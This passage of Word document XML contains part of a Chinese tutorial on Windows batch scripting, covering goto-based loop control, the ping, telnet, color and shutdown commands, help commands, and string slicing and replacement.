      <w:r w:rsidRPr="00D84D5E">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> break</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> goto </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>实现程序中常用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> continue </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> break </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>其实非常简单</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      continue: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>循环的最后一行写上一个标签，跳转到这位置即可</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      break: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>循环的外面的下一句写上一个标签，跳转到这位置即可</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      Sample: (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>伪代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        for /F ["options"] %variable IN (command)  DO (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        ... do command ...</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        if ... goto continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        if ... goto break</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        ... do command ...</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        :continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        :break</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>四、其它命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">1. ping </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>测试网络联接状况以及信息包发送和接收状况。但是不能够测试端口。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ping IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>地址或主机名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> [-t] [-a] [-n count] [-l size]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数含义：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    -t </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不停地向目标主机发送数据；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    -a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>地址格式来显示目标主机的网络地址；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    -n count </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定要</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>多少次，具体次数由</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>来指定；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    -l size </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定发送到目标主机的数据包的大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample: ping 192.168.0.1 -t (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不停的测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>192.168.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，按</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl+c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>停止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample: for /L %%a in (0,1,255) do ping 192.168.0.%%a -n 1 &gt;&gt; tmp.txt (ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>一下所有的局域网电脑</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>测试端口使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> telnet IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>地址或主机名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>端口，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>协议的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">   Sample:  telnet 192.168.0.1 80 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>192.168.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">3.color </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置背景及字体颜色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> color bf</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   b </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是指定背景色的十六进制数字；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> f </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定前景颜色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即字体颜色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>颜色值</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:     0:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>黑色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>蓝色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>绿色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>湖蓝</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>红色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>紫色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>黄色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>白色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">               8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>灰色</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡蓝</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    A:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡绿</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    B:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>浅绿</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    C:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡红</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    D:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡紫</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    E:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡黄</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">    F:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>亮白</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果没有给定任何参数，该命令会将颜色还原到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> CMD.EXE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启动时的颜色。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果两参数一样，视为无效输入。只有一个参数时，设置字体。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">4. random </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>产生随机数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>正整数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0~)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">5. exit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结束程序。即时是被调用的程序，结束后也不会返回原程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>6. shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   shutdown -s </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>关机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>所有内置命令的帮助信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  ver /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  cmd /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  set /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  rem /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  if /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  echo /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  goto /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  for /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  shift /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  call /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>其他需要的常用命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  type /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  find /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  findstr /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  copy /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>五、字符串处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>分割字符串，以查看时间为例</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       %</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>源字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:~</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>起始值</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>截取长度</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>起始值从</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>开始；截取长度是可选的，如果省略逗号和截取长度，将会从起始值截取到结尾；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>截取长度如果是负数，表示截取到倒数第几个。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">      "%time%"      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"11:04:23.03" (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>完整的时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"hh:mm:ss.tt")</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      "%time:~0,5%" </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"hh:mm"(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"11:04")</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示从右向左移位操作的个数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示从左向右移位操作的个数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      "%time:~0,8%" </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示标准时间格式</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"hh:mm:ss"(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"11:04:23"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，前</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      "%time:~3,-3%"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"mm:ss"(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即从第</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>截去最后</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个的字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      "%time:~3%"   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"04:23.03"(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即去掉前</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      "%time:~-3%"  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>".tt"(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即最后</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>上面的字串分割格式，也可以用于其它地方，如目录路径：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"%cd:~0,10%"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>替换字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       set a="abcd1234"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       echo %a%          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"abcd1234"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set a=%a:1=kk%    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>替换</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“1”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“kk”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       echo %a%          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"abcdkk234"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>字符串合并</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>由于没有直接的字符串合并函数，只能用笨方法了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       set str1=%str1%%str2%    (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>合并</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> str1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> str2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
